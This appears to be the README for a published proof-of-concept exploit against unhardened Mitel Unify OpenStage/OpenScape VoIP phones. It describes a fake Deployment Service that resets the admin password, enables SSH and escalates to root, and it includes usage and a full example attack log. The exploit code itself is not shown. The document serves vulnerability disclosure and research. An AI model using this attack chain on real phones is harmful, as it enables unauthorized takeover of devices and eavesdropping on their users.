This Python script is a proof of concept to demonstrate a fake Deployment Service in the OpenStage/OpenScape world that pushes configuration into unhardened OpenStage and OpenScape phones. In the default configuration, the phone accepts any Deployment Service. The exploitation process is:
- The script connects a phone and triggers a connection to a fake Deployment Service.
- The Deployment service resets the admin password and enables SSH access.
- The script logs in as admin via SSH.
- The script elevates privileges to root.
- The script enables root login via SSH by restarting the Dropbear service without the root login restriction.
The details are explained in our blog post Remote code execution and elevation of local privileges in Mitel Unify OpenStage and OpenScape VoIP phones.
- Create certificates:
./make_certs.sh
- Install dependencies via your OS (or use a VENV):
apt install python3-paramiko python3-twisted
Overview of options:
$ ./openstage-fakedls-server.py --help usage: openstage-exploit [-h] --own-ip IPADDR [--own-port PORT] --target-ip IPADDR Proof of concept exploit for OpenScape/OpenStage VoIP phones. options: -h, --help show this help message and exit --own-ip IPADDR IP address of fake DLS server. --own-port PORT Port number of fake DLS server. (default: 9999) --target-ip IPADDR IP address of target phone. The author of this code is not responsible for any damage caused by the use or misuse of this PoC exploit. This PoCs is intended for educational and research purposes only, and should never be used to target or exploit systems without explicit permission from the owner.
Example run:
$ ./openstage-fakedls-server.py --own-ip 192.168.23.42 --target-ip 192.168.23.5 The author of this code is not responsible for any damage caused by the use or misuse of this PoC exploit. This PoCs is intended for educational and research purposes only, and should never be used to target or exploit systems without explicit permission from the owner. + Set up fake DLS server at port 9999 + Attacking target 192.168.23.5 using 192.168.23.42:9999 as fake DLS server. + Test if DLS interface TCP port at 192.168.23.5:8085 is open. + Send 'Contact me' to target 192.168.23.5:8085. + Sending 'Contact me' to target 192.168.23.5:8085 was successful. + Target phone 192.168.23.5 connected back to our fake DLS server via POST to /DeploymentService/LoginService. + Check if SSH port 192.168.23.5:22 is available. + Failed to establish SSH connection to root@192.168.23.5: Authentication failed. + Phone 192.168.23.5 has SSH enabled, but is not rooted, yet. Trying to root it. + SSH connected to admin@192.168.23.5 with password "123456". + Trying to root a target of type OpenScape Desk Phone CP710. + Phone 192.168.23.5 was prepared for rooting. + Test if DLS interface TCP port at 192.168.23.5:8085 is open. + Send 'Contact me' to target 192.168.23.5:8085. + Sending 'Contact me' to target 192.168.23.5:8085 was successful. + Target phone 192.168.23.5 connected back to our fake DLS server via POST to /DeploymentService/LoginService. + Check if SSH port 192.168.23.5:22 is available. + Phone 192.168.23.5: Reenable SSH and change password again. + Target phone 192.168.23.5 connected back to our fake DLS server via POST to /DeploymentService/LoginService. + Check if SSH port 192.168.23.5:22 is available. + SSH connected to root@192.168.23.5 with password "123456". + Test if DLS interface TCP port at 192.168.23.5:8085 is open. + Send 'Contact me' to target 192.168.23.5:8085. + Sending 'Contact me' to target 192.168.23.5:8085 was successful. + Target phone 192.168.23.5 connected back to our fake DLS server via POST to /DeploymentService/LoginService. + Check if SSH port 192.168.23.5:22 is available. + Phone 192.168.23.5 is already/now rooted. There is nothing really to do.
The Proof of concept is published by Pentagrid AG under a BSD licence with
a non-military clause. Please read LICENSE.txt
for further details.
The author of this code is not responsible for any damage caused by the use or misuse of this PoC exploit. This PoCs is intended for educational and research purposes only, and should never be used to target or exploit systems without explicit permission from the owner.